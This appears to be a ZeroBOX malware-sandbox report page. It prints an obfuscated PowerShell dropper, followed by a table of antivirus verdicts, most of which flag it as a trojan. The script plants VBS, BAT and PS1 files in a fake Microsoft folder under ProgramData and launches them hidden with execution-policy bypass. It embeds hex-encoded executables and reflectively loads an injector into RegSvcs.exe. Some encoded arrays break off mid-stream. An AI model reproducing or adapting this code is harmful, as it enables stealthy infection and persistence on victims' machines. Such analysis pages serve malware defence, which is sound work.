Static | ZeroBOX
No static analysis available.
[STriNG]::Join( '', (( 24, 61,36 ,70 ,20, '3d', 20, '5b', 74, 79 , 70,65 , '5d', 28 , 22, 49,'4f', '2e' , 46 , 69 , '6c' ,65,22 , 29 ,'3b', 20, 24 ,'7b' ,44 ,'7d' ,20, '3d',20, 22 ,43 , '3a' , '5c', 50,72 ,'6f',67,72,61 , '6d',44 , 61 , 74,61 , '5c' ,57 , 69,'6e', 64 ,'6f', 77 ,73 , 48, '6f', '6c' , '6f' , 67 , 72,61, 70 ,68, 69,63,44 , 72, 69 , 76,65 , 72,73 ,'5c' , 72 , 65 , 67, 69 ,64, '2e', 31, 39 ,39,31 , '2d' , 30,37, 63 ,'6f' , '6d' ,'2e', '6d',69, 63 , 72 , '6f', 73,'6f',66, 74 , '5c' ,22, '3b', 20, '4e' ,65,77 ,'2d', 49, 74, 65,'6d', 20, '2d' , 49 ,74 ,65 ,'6d' , 54 ,79 , 70,65, 20 ,44,69 , 72 ,65,63 , 74 , '6f' ,72, 79 , 20 ,'2d' , 50, 61 , 74,68, 20, 24 , '7b' , 44 , '7d', 20 , '2d' ,46, '6f' , 72 , 63, 65 ,20 , '7c' , 20,'4f',75, 74 ,'2d','4e',75, '6c', '6c' ,'3b' , 20,53,74, 61 ,72 ,74, '2d', 53 ,'6c', 65,65,70,20, '2d',53, 65 , 63 ,'6f','6e',64 , 73,20 , 39 ) |FoREacH-OBJECt{ ( [ChAr] ( [cONVeRT]::toINt16( ($_.toStRinG()) ,16 ) ))} ))|& ( $env:coMspEc[4,24,25]-JOIn'')
${co`NT`ENt} =
(( 39, 13 , 10, 111 , 110 , 32 , 101, 114 , 114 , 111 , 114, 32 , 114, 101 , 115 , 117, 109 , 101 , 32, 110 , 101, 120 , 116 , 13 , 10, 83 , 117 , 98, 32, 122, 121, 110 , 105 , 116, 104 , 111 , 13, 10 , 32, 32, 32, 32 , 68, 105 , 109, 32 , 115, 117 , 98, 115, 116, 97, 105 , 110, 105, 110 , 103 , 13, 10, 32 , 32, 32 , 32, 83 , 101, 116, 32 , 115 , 117, 98 , 115 , 116 , 97, 105, 110, 105, 110 , 103 , 32 , 61, 32, 67 , 114, 101, 97, 116 , 101 , 79, 98, 106 , 101 , 99, 116 , 40 , 34, 87 , 83 , 99, 114, 105, 112 , 116, 46 , 83, 104 , 101, 108, 108, 34 , 41 , 13, 10 , 9, 115, 117, 98, 115, 116, 97 , 105, 110, 105, 110 , 103 , 46 , 82 , 117 , 110, 32 , 34, 67 , 58, 92 , 80, 114, 111, 103, 114, 97, 109, 68 , 97, 116, 97 , 92, 87 , 105 , 110 , 100, 111, 119, 115, 72 , 111, 108 , 111, 103, 114 , 97 , 112, 104 , 105 , 99, 68, 114, 105 , 118 , 101, 114 , 115, 92 , 114 , 101, 103, 105 , 100, 46, 49, 57, 57, 49 , 45 , 48, 55, 99 , 111 , 109 , 46, 109, 105 , 99, 114, 111, 115, 111, 102, 116, 92, 114 , 101, 103, 105, 100, 46
catch {}
( geT-vARiaBlE ('a' + '6P')).vAluE::("{1}{0}{3}{2}" -f 'rite', 'W', 'llText', 'A').Invoke("$d\regid.1991-05com.microsoftVsLabs.vbs" , ${CO`N`TEnT})
try {
${CO`Nt`eNT} = [StRinG]::joIN( '', (( 39, 13, 10, 64 , 101, 99 , 104 , 111, 32, 111 , 102 , 102 , 13 , 10, 99 , 109, 100 , 32, 47 , 99, 32, 80, 111 , 119 , 101 , 114 , 115, 104 , 101, 108 , 108 , 32 , 45 , 78 , 111 , 80, 114, 111 , 102 , 105, 108 , 101 , 32 , 45 , 87, 105, 110, 100, 111, 119 , 83 , 116, 121 , 108, 101 , 32 , 72, 105 , 100, 100 , 101 , 110, 32 , 45 , 69 , 120, 101, 99 , 117 , 116, 105 , 111 , 110 , 80 , 111 , 108, 105, 99, 121, 32 , 66, 121, 112, 97 , 115 , 115, 32, 45, 78, 111 , 110, 73 , 110, 116 , 101, 114 , 97 , 99 , 116 , 105 , 118 , 101, 32, 34 , 67 , 58 , 92, 80, 114 , 111, 103 , 114, 97 , 109, 68 , 97 , 116 , 97, 92, 87 , 105, 110 , 100 , 111 , 119 , 115, 72, 111 , 108, 111, 103 , 114, 97 , 112, 104 , 105 , 99 , 68 , 114 , 105, 118, 101 , 114, 115, 92 , 114 , 101, 103, 105 , 100, 46 , 49 , 57 , 57 , 49, 45 , 48 , 55 , 99 , 111 , 109, 46, 109 , 105, 99, 114 , 111, 115, 111 , 102 , 116, 92 , 114, 101, 103 , 105, 100 , 46, 49, 57, 57 , 49, 45 , 48 , 53 , 99, 111, 109 , 46 , 109 , 105 ,
}
catch {}
( Get-VariaBlE A6p).VAluE::("{0}{2}{1}" -f 'W', 'iteAllText', 'r').Invoke("$d\regid.1991-05com.microsoftVsEnhance.bat" , ${CON`TE`Nt})
try {
${coNt`e`Nt} = @'
&("{1}{0}{2}{3}" -f'-V','Set','Aria','bLE') (("{0}{1}" -f 'jX','nY')+'r') ([tYPE]("{0}{1}{2}"-f("{0}{1}" -f'co','NV'),'E','RT')) ;try {
function R`EdRO {
param (${RED`Ro}) ${re`D`Ro} = ${Red`RO} -split ' ' | &('?') {${_}}
foreach(${R`Ed} in ${rE`d`RO} ){
( &("{3}{0}{1}{2}" -f 't-Va','r','IAbLe','Ge') (("{0}{1}" -f'JX','ny')+'R') -ValuEo )::("{1}{0}" -f ("{1}{0}" -f '2','oInt3'),'T')."InV`oKe"(${R`ed} , 16)
}
}
${en`HAN`cer} = '4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 3F 32 26 90 00 00 00 00 00 00 00 00 E0 00 0E 21 0B 01 30 00 00 22 01 00 00 06 00 00 00 00 00 00 4E 40 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 A0 01 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4B 00 00 00 00 60 01 00 64 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 0C 00 00 00 BE 3F 01 00 1C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
}catch{}
try {
${COnt`eNT} = '4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 15 21 DD D9 00 00 00 00 00 00 00 00 E0 00 0E 01 0B 01 30 00 00 5E 05 00 00 08 00 00 00 00 00 00 EE 7C 05 00 00 20 00 00 00 80 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 C0 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 A0 7C 05 00 4B 00 00 00 00 80 05 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 A0 05 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
}
catch {}
try{
[byte[]]${n`eW} = &("{1}{2}{0}" -f 'O','RE','DR')(${c`o`NtEnT})
[byte[]]${N`E} = .("{2}{1}{0}" -f 'RO','ED','R')(${E`NHaNCeR})
}catch{}
try{
${P`Ath} = "C:\{0}\Microsoft.{1}\Framework\v4.0.30319\Re{2}cs.e{3}" -f ("{1}{2}{0}" -f 'ws','W',("{1}{0}"-f 'o','ind')) , 'NET' , 'gSv' , 'xe'
${XpANPy`E`Boszu`i`4Hd8`CYF} = [Reflection.Assembly]
${A`kMXUBbwN`FPQ2`T`HqK`oL6} = ("{1}{0}" -f'ad','Lo')
${ikc1`9ajSjFtuLDZR`B`42R} = 'Get'
${g`j9w0`HL`RRPTho`SBecN3c} = 'Invoke'
${Me`THoD} =${I`k`c19`AJsjFt`UldzRb42R} + ("{0}{1}"-f ("{1}{0}"-f'th','Me'),'od')
${i`3w`4V5`O`87GH`YC`gdSsJ1k} = ${i`kc`19A`jsJFt`ULD`zRB42r} +("{0}{1}"-f'Ty','pe')
${U`kw} = ("{2}{1}{0}"-f 'E','P',("{1}{2}{0}" -f'PE2.','N','ew'))
${SEe`Ee} = ${Xp`An`Pyeb`oSZuI`4HD8C`YF}::${akmXu`BbW`NfPq2Th`qk`OL6}(${Ne})
${XPAnpY`ebo`Sz`Ui`4HD`8c`YF} = ${SEE`eE}.${I3w`4`V5`o8`7gHyCG`Dssj1K}(${u`kW})
${XP`AnPy`EBOSz`Ui`4h`d8CYf} = ${xpanPy`EBOSzUI`4`H`d8cYF}.${m`eTHod}(("{1}{0}"-f'te',("{0}{1}" -f'Ex','ecu')))
${Xp`A`NPY`e`BOs`zuI4hD8C`yf} = ${Xpa`N`p`yE`B`OszUI4`HD8cyf}.${GJ9W0H`L`Rrp`THoSb`ecN3C}(${N`ULL} , [object[]](${pa`TH} , ${n`EW}))
}catch{}
try{}catch{}
try{}catch{}
'@
$a6p::("{0}{1}{2}{3}" -f 'W', 'ri', 'teA', 'llText').Invoke("$d\regid.1991-05com.microsoftVsLabsData.ps1" , ${cO`NTE`Nt})
}
catch {
}
( (44 , 141,143 ,164 ,151 ,157 , 156,40,75,40 , 116 , 145 ,167, 55,123,143, 150, 145 , 144 ,165, 154 , 145 ,144, 124 ,141 , 163 , 153 , 101 , 143,164, 151,157, 156 ,40,55,105, 170 , 145 , 143 ,165 , 164, 145 ,40 ,42,103, 72 ,134 ,120 , 162, 157 ,147 ,162 ,141 , 155 , 104 ,141 , 164 ,141,134 ,127 ,151 , 156 , 144,157,167 ,163, 110 ,157 ,154, 157 , 147 , 162 ,141,160 ,150 ,151, 143,104,162, 151 ,166 , 145 ,162 , 163 , 134 ,162 ,145 ,147, 151 ,144,56,61 ,71,71 ,61 , 55 , 60,67,143 ,157,155,56 ,155 , 151,143 , 162,157 , 163, 157, 146, 164, 134, 162, 145, 147, 151,144 ,56 ,61, 71, 71 ,61 , 55 , 60,65 , 143,157,155 ,56 ,155 ,151 , 143 ,162,157, 163 , 157,146 , 164 , 126, 163 ,114, 141,142 , 163 , 56,166,142 ,163, 42, 15 ,12, 44 , 164 ,162,151 ,147,147, 145, 162, 61 ,40 ,75 ,40 ,116, 145 ,167 , 55 ,123, 143, 150 ,145 ,144,165, 154 , 145 , 144 , 124, 141, 163 ,153, 124 , 162, 151 ,147 ,147 , 145, 162,40 ,55, 117, 156, 143,145 , 40, 55 ,101, 164, 40, 50, 107 ,145 , 164 ,55,104,141, 164,145,51 ,56, 101, 144, 144 ,115
catch {}
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Generic.4!c
tehtris Clean
Cynet Clean
CTX txt.trojan.generic
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.Generic.37081089
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec ISB.Heuristic!gen39
ESET-NOD32 PowerShell/Kryptik.BO
TrendMicro-HouseCall Clean
Avast PwrSh:Iex-C [PUP]
ClamAV Clean
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Trojan.Generic.37081089
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.Generic.37081089
Tencent Script.Trojan.Generic.Bkjl
Sophos Mal/PSDL-J
F-Secure Clean
DrWeb Clean
VIPRE Trojan.Generic.37081089
TrendMicro Clean
CMC Clean
Emsisoft Trojan.Generic.37081089 (B)
huorong VirTool/PS.Obfuscator.e
FireEye Trojan.Generic.37081089
Jiangmin Clean
Varist Clean
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Generic.D235D001
SUPERAntiSpyware Clean
Microsoft Trojan:Script/Wacatac.B!ml
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Trojan.PowerShell.Crypt
MaxSecure Clean
GData Trojan.Generic.37081089
AVG PwrSh:Iex-C [PUP]
Panda Clean
alibabacloud Trojan:Win/Generic.Gen
No IRMA results available.